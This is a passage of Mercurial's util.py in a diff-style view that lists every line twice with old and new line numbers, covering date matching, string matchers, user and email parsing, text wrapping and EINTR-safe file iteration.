2206 if offset < -50400 or offset > 43200:
2203 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2207 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2204 return when, offset
2208 return when, offset
2205
2209
2206 def matchdate(date):
2210 def matchdate(date):
2207 """Return a function that matches a given date match specifier
2211 """Return a function that matches a given date match specifier
2208
2212
2209 Formats include:
2213 Formats include:
2210
2214
2211 '{date}' match a given date to the accuracy provided
2215 '{date}' match a given date to the accuracy provided
2212
2216
2213 '<{date}' on or before a given date
2217 '<{date}' on or before a given date
2214
2218
2215 '>{date}' on or after a given date
2219 '>{date}' on or after a given date
2216
2220
2217 >>> p1 = parsedate(b"10:29:59")
2221 >>> p1 = parsedate(b"10:29:59")
2218 >>> p2 = parsedate(b"10:30:00")
2222 >>> p2 = parsedate(b"10:30:00")
2219 >>> p3 = parsedate(b"10:30:59")
2223 >>> p3 = parsedate(b"10:30:59")
2220 >>> p4 = parsedate(b"10:31:00")
2224 >>> p4 = parsedate(b"10:31:00")
2221 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2225 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2222 >>> f = matchdate(b"10:30")
2226 >>> f = matchdate(b"10:30")
2223 >>> f(p1[0])
2227 >>> f(p1[0])
2224 False
2228 False
2225 >>> f(p2[0])
2229 >>> f(p2[0])
2226 True
2230 True
2227 >>> f(p3[0])
2231 >>> f(p3[0])
2228 True
2232 True
2229 >>> f(p4[0])
2233 >>> f(p4[0])
2230 False
2234 False
2231 >>> f(p5[0])
2235 >>> f(p5[0])
2232 False
2236 False
2233 """
2237 """
2234
2238
2235 def lower(date):
2239 def lower(date):
2236 d = {'mb': "1", 'd': "1"}
2240 d = {'mb': "1", 'd': "1"}
2237 return parsedate(date, extendeddateformats, d)[0]
2241 return parsedate(date, extendeddateformats, d)[0]
2238
2242
2239 def upper(date):
2243 def upper(date):
2240 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2244 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2241 for days in ("31", "30", "29"):
2245 for days in ("31", "30", "29"):
2242 try:
2246 try:
2243 d["d"] = days
2247 d["d"] = days
2244 return parsedate(date, extendeddateformats, d)[0]
2248 return parsedate(date, extendeddateformats, d)[0]
2245 except error.ParseError:
2249 except error.ParseError:
2246 pass
2250 pass
2247 d["d"] = "28"
2251 d["d"] = "28"
2248 return parsedate(date, extendeddateformats, d)[0]
2252 return parsedate(date, extendeddateformats, d)[0]
2249
2253
2250 date = date.strip()
2254 date = date.strip()
2251
2255
2252 if not date:
2256 if not date:
2253 raise Abort(_("dates cannot consist entirely of whitespace"))
2257 raise Abort(_("dates cannot consist entirely of whitespace"))
2254 elif date[0] == "<":
2258 elif date[0] == "<":
2255 if not date[1:]:
2259 if not date[1:]:
2256 raise Abort(_("invalid day spec, use '<DATE'"))
2260 raise Abort(_("invalid day spec, use '<DATE'"))
2257 when = upper(date[1:])
2261 when = upper(date[1:])
2258 return lambda x: x <= when
2262 return lambda x: x <= when
2259 elif date[0] == ">":
2263 elif date[0] == ">":
2260 if not date[1:]:
2264 if not date[1:]:
2261 raise Abort(_("invalid day spec, use '>DATE'"))
2265 raise Abort(_("invalid day spec, use '>DATE'"))
2262 when = lower(date[1:])
2266 when = lower(date[1:])
2263 return lambda x: x >= when
2267 return lambda x: x >= when
2264 elif date[0] == "-":
2268 elif date[0] == "-":
2265 try:
2269 try:
2266 days = int(date[1:])
2270 days = int(date[1:])
2267 except ValueError:
2271 except ValueError:
2268 raise Abort(_("invalid day spec: %s") % date[1:])
2272 raise Abort(_("invalid day spec: %s") % date[1:])
2269 if days < 0:
2273 if days < 0:
2270 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2274 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2271 % date[1:])
2275 % date[1:])
2272 when = makedate()[0] - days * 3600 * 24
2276 when = makedate()[0] - days * 3600 * 24
2273 return lambda x: x >= when
2277 return lambda x: x >= when
2274 elif " to " in date:
2278 elif " to " in date:
2275 a, b = date.split(" to ")
2279 a, b = date.split(" to ")
2276 start, stop = lower(a), upper(b)
2280 start, stop = lower(a), upper(b)
2277 return lambda x: x >= start and x <= stop
2281 return lambda x: x >= start and x <= stop
2278 else:
2282 else:
2279 start, stop = lower(date), upper(date)
2283 start, stop = lower(date), upper(date)
2280 return lambda x: x >= start and x <= stop
2284 return lambda x: x >= start and x <= stop
2281
2285
2282 def stringmatcher(pattern, casesensitive=True):
2286 def stringmatcher(pattern, casesensitive=True):
2283 """
2287 """
2284 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2288 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2285 returns the matcher name, pattern, and matcher function.
2289 returns the matcher name, pattern, and matcher function.
2286 missing or unknown prefixes are treated as literal matches.
2290 missing or unknown prefixes are treated as literal matches.
2287
2291
2288 helper for tests:
2292 helper for tests:
2289 >>> def test(pattern, *tests):
2293 >>> def test(pattern, *tests):
2290 ... kind, pattern, matcher = stringmatcher(pattern)
2294 ... kind, pattern, matcher = stringmatcher(pattern)
2291 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2295 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2292 >>> def itest(pattern, *tests):
2296 >>> def itest(pattern, *tests):
2293 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2297 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2294 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2298 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2295
2299
2296 exact matching (no prefix):
2300 exact matching (no prefix):
2297 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2301 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2298 ('literal', 'abcdefg', [False, False, True])
2302 ('literal', 'abcdefg', [False, False, True])
2299
2303
2300 regex matching ('re:' prefix)
2304 regex matching ('re:' prefix)
2301 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2305 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2302 ('re', 'a.+b', [False, False, True])
2306 ('re', 'a.+b', [False, False, True])
2303
2307
2304 force exact matches ('literal:' prefix)
2308 force exact matches ('literal:' prefix)
2305 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2309 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2306 ('literal', 're:foobar', [False, True])
2310 ('literal', 're:foobar', [False, True])
2307
2311
2308 unknown prefixes are ignored and treated as literals
2312 unknown prefixes are ignored and treated as literals
2309 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2313 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2310 ('literal', 'foo:bar', [False, False, True])
2314 ('literal', 'foo:bar', [False, False, True])
2311
2315
2312 case insensitive regex matches
2316 case insensitive regex matches
2313 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2317 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2314 ('re', 'A.+b', [False, False, True])
2318 ('re', 'A.+b', [False, False, True])
2315
2319
2316 case insensitive literal matches
2320 case insensitive literal matches
2317 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2321 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2318 ('literal', 'ABCDEFG', [False, False, True])
2322 ('literal', 'ABCDEFG', [False, False, True])
2319 """
2323 """
2320 if pattern.startswith('re:'):
2324 if pattern.startswith('re:'):
2321 pattern = pattern[3:]
2325 pattern = pattern[3:]
2322 try:
2326 try:
2323 flags = 0
2327 flags = 0
2324 if not casesensitive:
2328 if not casesensitive:
2325 flags = remod.I
2329 flags = remod.I
2326 regex = remod.compile(pattern, flags)
2330 regex = remod.compile(pattern, flags)
2327 except remod.error as e:
2331 except remod.error as e:
2328 raise error.ParseError(_('invalid regular expression: %s')
2332 raise error.ParseError(_('invalid regular expression: %s')
2329 % e)
2333 % e)
2330 return 're', pattern, regex.search
2334 return 're', pattern, regex.search
2331 elif pattern.startswith('literal:'):
2335 elif pattern.startswith('literal:'):
2332 pattern = pattern[8:]
2336 pattern = pattern[8:]
2333
2337
2334 match = pattern.__eq__
2338 match = pattern.__eq__
2335
2339
2336 if not casesensitive:
2340 if not casesensitive:
2337 ipat = encoding.lower(pattern)
2341 ipat = encoding.lower(pattern)
2338 match = lambda s: ipat == encoding.lower(s)
2342 match = lambda s: ipat == encoding.lower(s)
2339 return 'literal', pattern, match
2343 return 'literal', pattern, match
2340
2344
2341 def shortuser(user):
2345 def shortuser(user):
2342 """Return a short representation of a user name or email address."""
2346 """Return a short representation of a user name or email address."""
2343 f = user.find('@')
2347 f = user.find('@')
2344 if f >= 0:
2348 if f >= 0:
2345 user = user[:f]
2349 user = user[:f]
2346 f = user.find('<')
2350 f = user.find('<')
2347 if f >= 0:
2351 if f >= 0:
2348 user = user[f + 1:]
2352 user = user[f + 1:]
2349 f = user.find(' ')
2353 f = user.find(' ')
2350 if f >= 0:
2354 if f >= 0:
2351 user = user[:f]
2355 user = user[:f]
2352 f = user.find('.')
2356 f = user.find('.')
2353 if f >= 0:
2357 if f >= 0:
2354 user = user[:f]
2358 user = user[:f]
2355 return user
2359 return user
2356
2360
2357 def emailuser(user):
2361 def emailuser(user):
2358 """Return the user portion of an email address."""
2362 """Return the user portion of an email address."""
2359 f = user.find('@')
2363 f = user.find('@')
2360 if f >= 0:
2364 if f >= 0:
2361 user = user[:f]
2365 user = user[:f]
2362 f = user.find('<')
2366 f = user.find('<')
2363 if f >= 0:
2367 if f >= 0:
2364 user = user[f + 1:]
2368 user = user[f + 1:]
2365 return user
2369 return user
2366
2370
2367 def email(author):
2371 def email(author):
2368 '''get email of author.'''
2372 '''get email of author.'''
2369 r = author.find('>')
2373 r = author.find('>')
2370 if r == -1:
2374 if r == -1:
2371 r = None
2375 r = None
2372 return author[author.find('<') + 1:r]
2376 return author[author.find('<') + 1:r]
2373
2377
2374 def ellipsis(text, maxlength=400):
2378 def ellipsis(text, maxlength=400):
2375 """Trim string to at most maxlength (default: 400) columns in display."""
2379 """Trim string to at most maxlength (default: 400) columns in display."""
2376 return encoding.trim(text, maxlength, ellipsis='...')
2380 return encoding.trim(text, maxlength, ellipsis='...')
2377
2381
2378 def unitcountfn(*unittable):
2382 def unitcountfn(*unittable):
2379 '''return a function that renders a readable count of some quantity'''
2383 '''return a function that renders a readable count of some quantity'''
2380
2384
2381 def go(count):
2385 def go(count):
2382 for multiplier, divisor, format in unittable:
2386 for multiplier, divisor, format in unittable:
2383 if abs(count) >= divisor * multiplier:
2387 if abs(count) >= divisor * multiplier:
2384 return format % (count / float(divisor))
2388 return format % (count / float(divisor))
2385 return unittable[-1][2] % count
2389 return unittable[-1][2] % count
2386
2390
2387 return go
2391 return go
2388
2392
2389 def processlinerange(fromline, toline):
2393 def processlinerange(fromline, toline):
2390 """Check that linerange <fromline>:<toline> makes sense and return a
2394 """Check that linerange <fromline>:<toline> makes sense and return a
2391 0-based range.
2395 0-based range.
2392
2396
2393 >>> processlinerange(10, 20)
2397 >>> processlinerange(10, 20)
2394 (9, 20)
2398 (9, 20)
2395 >>> processlinerange(2, 1)
2399 >>> processlinerange(2, 1)
2396 Traceback (most recent call last):
2400 Traceback (most recent call last):
2397 ...
2401 ...
2398 ParseError: line range must be positive
2402 ParseError: line range must be positive
2399 >>> processlinerange(0, 5)
2403 >>> processlinerange(0, 5)
2400 Traceback (most recent call last):
2404 Traceback (most recent call last):
2401 ...
2405 ...
2402 ParseError: fromline must be strictly positive
2406 ParseError: fromline must be strictly positive
2403 """
2407 """
2404 if toline - fromline < 0:
2408 if toline - fromline < 0:
2405 raise error.ParseError(_("line range must be positive"))
2409 raise error.ParseError(_("line range must be positive"))
2406 if fromline < 1:
2410 if fromline < 1:
2407 raise error.ParseError(_("fromline must be strictly positive"))
2411 raise error.ParseError(_("fromline must be strictly positive"))
2408 return fromline - 1, toline
2412 return fromline - 1, toline
2409
2413
2410 bytecount = unitcountfn(
2414 bytecount = unitcountfn(
2411 (100, 1 << 30, _('%.0f GB')),
2415 (100, 1 << 30, _('%.0f GB')),
2412 (10, 1 << 30, _('%.1f GB')),
2416 (10, 1 << 30, _('%.1f GB')),
2413 (1, 1 << 30, _('%.2f GB')),
2417 (1, 1 << 30, _('%.2f GB')),
2414 (100, 1 << 20, _('%.0f MB')),
2418 (100, 1 << 20, _('%.0f MB')),
2415 (10, 1 << 20, _('%.1f MB')),
2419 (10, 1 << 20, _('%.1f MB')),
2416 (1, 1 << 20, _('%.2f MB')),
2420 (1, 1 << 20, _('%.2f MB')),
2417 (100, 1 << 10, _('%.0f KB')),
2421 (100, 1 << 10, _('%.0f KB')),
2418 (10, 1 << 10, _('%.1f KB')),
2422 (10, 1 << 10, _('%.1f KB')),
2419 (1, 1 << 10, _('%.2f KB')),
2423 (1, 1 << 10, _('%.2f KB')),
2420 (1, 1, _('%.0f bytes')),
2424 (1, 1, _('%.0f bytes')),
2421 )
2425 )
2422
2426
2423 # Matches a single EOL which can either be a CRLF where repeated CR
2427 # Matches a single EOL which can either be a CRLF where repeated CR
2424 # are removed or a LF. We do not care about old Macintosh files, so a
2428 # are removed or a LF. We do not care about old Macintosh files, so a
2425 # stray CR is an error.
2429 # stray CR is an error.
2426 _eolre = remod.compile(br'\r*\n')
2430 _eolre = remod.compile(br'\r*\n')
2427
2431
2428 def tolf(s):
2432 def tolf(s):
2429 return _eolre.sub('\n', s)
2433 return _eolre.sub('\n', s)
2430
2434
2431 def tocrlf(s):
2435 def tocrlf(s):
2432 return _eolre.sub('\r\n', s)
2436 return _eolre.sub('\r\n', s)
2433
2437
2434 if pycompat.oslinesep == '\r\n':
2438 if pycompat.oslinesep == '\r\n':
2435 tonativeeol = tocrlf
2439 tonativeeol = tocrlf
2436 fromnativeeol = tolf
2440 fromnativeeol = tolf
2437 else:
2441 else:
2438 tonativeeol = pycompat.identity
2442 tonativeeol = pycompat.identity
2439 fromnativeeol = pycompat.identity
2443 fromnativeeol = pycompat.identity
2440
2444
2441 def escapestr(s):
2445 def escapestr(s):
2442 # call underlying function of s.encode('string_escape') directly for
2446 # call underlying function of s.encode('string_escape') directly for
2443 # Python 3 compatibility
2447 # Python 3 compatibility
2444 return codecs.escape_encode(s)[0]
2448 return codecs.escape_encode(s)[0]
2445
2449
2446 def unescapestr(s):
2450 def unescapestr(s):
2447 return codecs.escape_decode(s)[0]
2451 return codecs.escape_decode(s)[0]
2448
2452
2449 def forcebytestr(obj):
2453 def forcebytestr(obj):
2450 """Portably format an arbitrary object (e.g. exception) into a byte
2454 """Portably format an arbitrary object (e.g. exception) into a byte
2451 string."""
2455 string."""
2452 try:
2456 try:
2453 return pycompat.bytestr(obj)
2457 return pycompat.bytestr(obj)
2454 except UnicodeEncodeError:
2458 except UnicodeEncodeError:
2455 # non-ascii string, may be lossy
2459 # non-ascii string, may be lossy
2456 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2460 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2457
2461
2458 def uirepr(s):
2462 def uirepr(s):
2459 # Avoid double backslash in Windows path repr()
2463 # Avoid double backslash in Windows path repr()
2460 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2464 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2461
2465
2462 # delay import of textwrap
2466 # delay import of textwrap
2463 def MBTextWrapper(**kwargs):
2467 def MBTextWrapper(**kwargs):
2464 class tw(textwrap.TextWrapper):
2468 class tw(textwrap.TextWrapper):
2465 """
2469 """
2466 Extend TextWrapper for width-awareness.
2470 Extend TextWrapper for width-awareness.
2467
2471
2468 Neither number of 'bytes' in any encoding nor 'characters' is
2472 Neither number of 'bytes' in any encoding nor 'characters' is
2469 appropriate to calculate terminal columns for specified string.
2473 appropriate to calculate terminal columns for specified string.
2470
2474
2471 Original TextWrapper implementation uses built-in 'len()' directly,
2475 Original TextWrapper implementation uses built-in 'len()' directly,
2472 so overriding is needed to use width information of each characters.
2476 so overriding is needed to use width information of each characters.
2473
2477
2474 In addition, characters classified into 'ambiguous' width are
2478 In addition, characters classified into 'ambiguous' width are
2475 treated as wide in East Asian area, but as narrow in other.
2479 treated as wide in East Asian area, but as narrow in other.
2476
2480
2477 This requires use decision to determine width of such characters.
2481 This requires use decision to determine width of such characters.
2478 """
2482 """
2479 def _cutdown(self, ucstr, space_left):
2483 def _cutdown(self, ucstr, space_left):
2480 l = 0
2484 l = 0
2481 colwidth = encoding.ucolwidth
2485 colwidth = encoding.ucolwidth
2482 for i in xrange(len(ucstr)):
2486 for i in xrange(len(ucstr)):
2483 l += colwidth(ucstr[i])
2487 l += colwidth(ucstr[i])
2484 if space_left < l:
2488 if space_left < l:
2485 return (ucstr[:i], ucstr[i:])
2489 return (ucstr[:i], ucstr[i:])
2486 return ucstr, ''
2490 return ucstr, ''
2487
2491
2488 # overriding of base class
2492 # overriding of base class
2489 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2493 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2490 space_left = max(width - cur_len, 1)
2494 space_left = max(width - cur_len, 1)
2491
2495
2492 if self.break_long_words:
2496 if self.break_long_words:
2493 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2497 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2494 cur_line.append(cut)
2498 cur_line.append(cut)
2495 reversed_chunks[-1] = res
2499 reversed_chunks[-1] = res
2496 elif not cur_line:
2500 elif not cur_line:
2497 cur_line.append(reversed_chunks.pop())
2501 cur_line.append(reversed_chunks.pop())
2498
2502
2499 # this overriding code is imported from TextWrapper of Python 2.6
2503 # this overriding code is imported from TextWrapper of Python 2.6
2500 # to calculate columns of string by 'encoding.ucolwidth()'
2504 # to calculate columns of string by 'encoding.ucolwidth()'
2501 def _wrap_chunks(self, chunks):
2505 def _wrap_chunks(self, chunks):
2502 colwidth = encoding.ucolwidth
2506 colwidth = encoding.ucolwidth
2503
2507
2504 lines = []
2508 lines = []
2505 if self.width <= 0:
2509 if self.width <= 0:
2506 raise ValueError("invalid width %r (must be > 0)" % self.width)
2510 raise ValueError("invalid width %r (must be > 0)" % self.width)
2507
2511
2508 # Arrange in reverse order so items can be efficiently popped
2512 # Arrange in reverse order so items can be efficiently popped
2509 # from a stack of chucks.
2513 # from a stack of chucks.
2510 chunks.reverse()
2514 chunks.reverse()
2511
2515
2512 while chunks:
2516 while chunks:
2513
2517
2514 # Start the list of chunks that will make up the current line.
2518 # Start the list of chunks that will make up the current line.
2515 # cur_len is just the length of all the chunks in cur_line.
2519 # cur_len is just the length of all the chunks in cur_line.
2516 cur_line = []
2520 cur_line = []
2517 cur_len = 0
2521 cur_len = 0
2518
2522
2519 # Figure out which static string will prefix this line.
2523 # Figure out which static string will prefix this line.
2520 if lines:
2524 if lines:
2521 indent = self.subsequent_indent
2525 indent = self.subsequent_indent
2522 else:
2526 else:
2523 indent = self.initial_indent
2527 indent = self.initial_indent
2524
2528
2525 # Maximum width for this line.
2529 # Maximum width for this line.
2526 width = self.width - len(indent)
2530 width = self.width - len(indent)
2527
2531
2528 # First chunk on line is whitespace -- drop it, unless this
2532 # First chunk on line is whitespace -- drop it, unless this
2529 # is the very beginning of the text (i.e. no lines started yet).
2533 # is the very beginning of the text (i.e. no lines started yet).
2530 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2534 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2531 del chunks[-1]
2535 del chunks[-1]
2532
2536
2533 while chunks:
2537 while chunks:
2534 l = colwidth(chunks[-1])
2538 l = colwidth(chunks[-1])
2535
2539
2536 # Can at least squeeze this chunk onto the current line.
2540 # Can at least squeeze this chunk onto the current line.
2537 if cur_len + l <= width:
2541 if cur_len + l <= width:
2538 cur_line.append(chunks.pop())
2542 cur_line.append(chunks.pop())
2539 cur_len += l
2543 cur_len += l
2540
2544
2541 # Nope, this line is full.
2545 # Nope, this line is full.
2542 else:
2546 else:
2543 break
2547 break
2544
2548
2545 # The current line is full, and the next chunk is too big to
2549 # The current line is full, and the next chunk is too big to
2546 # fit on *any* line (not just this one).
2550 # fit on *any* line (not just this one).
2547 if chunks and colwidth(chunks[-1]) > width:
2551 if chunks and colwidth(chunks[-1]) > width:
2548 self._handle_long_word(chunks, cur_line, cur_len, width)
2552 self._handle_long_word(chunks, cur_line, cur_len, width)
2549
2553
2550 # If the last chunk on this line is all whitespace, drop it.
2554 # If the last chunk on this line is all whitespace, drop it.
2551 if (self.drop_whitespace and
2555 if (self.drop_whitespace and
2552 cur_line and cur_line[-1].strip() == r''):
2556 cur_line and cur_line[-1].strip() == r''):
2553 del cur_line[-1]
2557 del cur_line[-1]
2554
2558
2555 # Convert current line back to a string and store it in list
2559 # Convert current line back to a string and store it in list
2556 # of all lines (return value).
2560 # of all lines (return value).
2557 if cur_line:
2561 if cur_line:
2558 lines.append(indent + r''.join(cur_line))
2562 lines.append(indent + r''.join(cur_line))
2559
2563
2560 return lines
2564 return lines
2561
2565
2562 global MBTextWrapper
2566 global MBTextWrapper
2563 MBTextWrapper = tw
2567 MBTextWrapper = tw
2564 return tw(**kwargs)
2568 return tw(**kwargs)
2565
2569
2566 def wrap(line, width, initindent='', hangindent=''):
2570 def wrap(line, width, initindent='', hangindent=''):
2567 maxindent = max(len(hangindent), len(initindent))
2571 maxindent = max(len(hangindent), len(initindent))
2568 if width <= maxindent:
2572 if width <= maxindent:
2569 # adjust for weird terminal size
2573 # adjust for weird terminal size
2570 width = max(78, maxindent + 1)
2574 width = max(78, maxindent + 1)
2571 line = line.decode(pycompat.sysstr(encoding.encoding),
2575 line = line.decode(pycompat.sysstr(encoding.encoding),
2572 pycompat.sysstr(encoding.encodingmode))
2576 pycompat.sysstr(encoding.encodingmode))
2573 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2577 initindent = initindent.decode(pycompat.sysstr(encoding.encoding),
2574 pycompat.sysstr(encoding.encodingmode))
2578 pycompat.sysstr(encoding.encodingmode))
2575 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2579 hangindent = hangindent.decode(pycompat.sysstr(encoding.encoding),
2576 pycompat.sysstr(encoding.encodingmode))
2580 pycompat.sysstr(encoding.encodingmode))
2577 wrapper = MBTextWrapper(width=width,
2581 wrapper = MBTextWrapper(width=width,
2578 initial_indent=initindent,
2582 initial_indent=initindent,
2579 subsequent_indent=hangindent)
2583 subsequent_indent=hangindent)
2580 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2584 return wrapper.fill(line).encode(pycompat.sysstr(encoding.encoding))
2581
2585
2582 if (pyplatform.python_implementation() == 'CPython' and
2586 if (pyplatform.python_implementation() == 'CPython' and
2583 sys.version_info < (3, 0)):
2587 sys.version_info < (3, 0)):
2584 # There is an issue in CPython that some IO methods do not handle EINTR
2588 # There is an issue in CPython that some IO methods do not handle EINTR
2585 # correctly. The following table shows what CPython version (and functions)
2589 # correctly. The following table shows what CPython version (and functions)
2586 # are affected (buggy: has the EINTR bug, okay: otherwise):
2590 # are affected (buggy: has the EINTR bug, okay: otherwise):
2587 #
2591 #
2588 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2592 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2589 # --------------------------------------------------
2593 # --------------------------------------------------
2590 # fp.__iter__ | buggy | buggy | okay
2594 # fp.__iter__ | buggy | buggy | okay
2591 # fp.read* | buggy | okay [1] | okay
2595 # fp.read* | buggy | okay [1] | okay
2592 #
2596 #
2593 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2597 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2594 #
2598 #
2595 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2599 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2596 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2600 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2597 #
2601 #
2598 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2602 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2599 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2603 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2600 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2604 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2601 # fp.__iter__ but not other fp.read* methods.
2605 # fp.__iter__ but not other fp.read* methods.
2602 #
2606 #
2603 # On modern systems like Linux, the "read" syscall cannot be interrupted
2607 # On modern systems like Linux, the "read" syscall cannot be interrupted
2604 # when reading "fast" files like on-disk files. So the EINTR issue only
2608 # when reading "fast" files like on-disk files. So the EINTR issue only
2605 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2609 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2606 # files approximately as "fast" files and use the fast (unsafe) code path,
2610 # files approximately as "fast" files and use the fast (unsafe) code path,
2607 # to minimize the performance impact.
2611 # to minimize the performance impact.
2608 if sys.version_info >= (2, 7, 4):
2612 if sys.version_info >= (2, 7, 4):
2609 # fp.readline deals with EINTR correctly, use it as a workaround.
2613 # fp.readline deals with EINTR correctly, use it as a workaround.
2610 def _safeiterfile(fp):
2614 def _safeiterfile(fp):
2611 return iter(fp.readline, '')
2615 return iter(fp.readline, '')
2612 else:
2616 else:
2613 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2617 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2614 # note: this may block longer than necessary because of bufsize.
2618 # note: this may block longer than necessary because of bufsize.
2615 def _safeiterfile(fp, bufsize=4096):
2619 def _safeiterfile(fp, bufsize=4096):
2616 fd = fp.fileno()
2620 fd = fp.fileno()
2617 line = ''
2621 line = ''
2618 while True:
2622 while True:
2619 try:
2623 try:
2620 buf = os.read(fd, bufsize)
2624 buf = os.read(fd, bufsize)
2621 except OSError as ex:
2625 except OSError as ex:
2622 # os.read only raises EINTR before any data is read
2626 # os.read only raises EINTR before any data is read
2623 if ex.errno == errno.EINTR:
2627 if ex.errno == errno.EINTR:
2624 continue
2628 continue
2625 else:
2629 else:
2626 raise
2630 raise
2627 line += buf
2631 line += buf
2628 if '\n' in buf:
2632 if '\n' in buf:
2629 splitted = line.splitlines(True)
2633 splitted = line.splitlines(True)
2630 line = ''
2634 line = ''
2631 for l in splitted:
2635 for l in splitted:
2632 if l[-1] == '\n':
2636 if l[-1] == '\n':
2633 yield l
2637 yield l
2634 else:
2638 else:
2635 line = l
2639 line = l
2636 if not buf:
2640 if not buf:
2637 break
2641 break
2638 if line:
2642 if line:
2639 yield line
2643 yield line
2640
2644
2641 def iterfile(fp):
2645 def iterfile(fp):
2642 fastpath = True
2646 fastpath = True
2643 if type(fp) is file:
2647 if type(fp) is file:
2644 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2648 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2645 if fastpath:
2649 if fastpath:
2646 return fp
2650 return fp
2647 else:
2651 else:
2648 return _safeiterfile(fp)
2652 return _safeiterfile(fp)
2649 else:
2653 else:
2650 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2654 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2651 def iterfile(fp):
2655 def iterfile(fp):
2652 return fp
2656 return fp
2653
2657
2654 def iterlines(iterator):
2658 def iterlines(iterator):
2655 for chunk in iterator:
2659 for chunk in iterator:
2656 for line in chunk.splitlines():
2660 for line in chunk.splitlines():
2657 yield line
2661 yield line
2658
2662
2659 def expandpath(path):
2663 def expandpath(path):
2660 return os.path.expanduser(os.path.expandvars(path))
2664 return os.path.expanduser(os.path.expandvars(path))
2661
2665
2662 def hgcmd():
2666 def hgcmd():
2663 """Return the command used to execute current hg
2667 """Return the command used to execute current hg
2664
2668
2665 This is different from hgexecutable() because on Windows we want
2669 This is different from hgexecutable() because on Windows we want
2666 to avoid things opening new shell windows like batch files, so we
2670 to avoid things opening new shell windows like batch files, so we
2667 get either the python call or current executable.
2671 get either the python call or current executable.
2668 """
2672 """
2669 if mainfrozen():
2673 if mainfrozen():
2670 if getattr(sys, 'frozen', None) == 'macosx_app':
2674 if getattr(sys, 'frozen', None) == 'macosx_app':
2671 # Env variable set by py2app
2675 # Env variable set by py2app
2672 return [encoding.environ['EXECUTABLEPATH']]
2676 return [encoding.environ['EXECUTABLEPATH']]
2673 else:
2677 else:
2674 return [pycompat.sysexecutable]
2678 return [pycompat.sysexecutable]
2675 return gethgcmd()
2679 return gethgcmd()
2676
2680
2677 def rundetached(args, condfn):
2681 def rundetached(args, condfn):
2678 """Execute the argument list in a detached process.
2682 """Execute the argument list in a detached process.
2679
2683
2680 condfn is a callable which is called repeatedly and should return
2684 condfn is a callable which is called repeatedly and should return
2681 True once the child process is known to have started successfully.
2685 True once the child process is known to have started successfully.
2682 At this point, the child process PID is returned. If the child
2686 At this point, the child process PID is returned. If the child
2683 process fails to start or finishes before condfn() evaluates to
2687 process fails to start or finishes before condfn() evaluates to
2684 True, return -1.
2688 True, return -1.
2685 """
2689 """
2686 # Windows case is easier because the child process is either
2690 # Windows case is easier because the child process is either
2687 # successfully starting and validating the condition or exiting
2691 # successfully starting and validating the condition or exiting
2688 # on failure. We just poll on its PID. On Unix, if the child
2692 # on failure. We just poll on its PID. On Unix, if the child
2689 # process fails to start, it will be left in a zombie state until
2693 # process fails to start, it will be left in a zombie state until
2690 # the parent wait on it, which we cannot do since we expect a long
2694 # the parent wait on it, which we cannot do since we expect a long
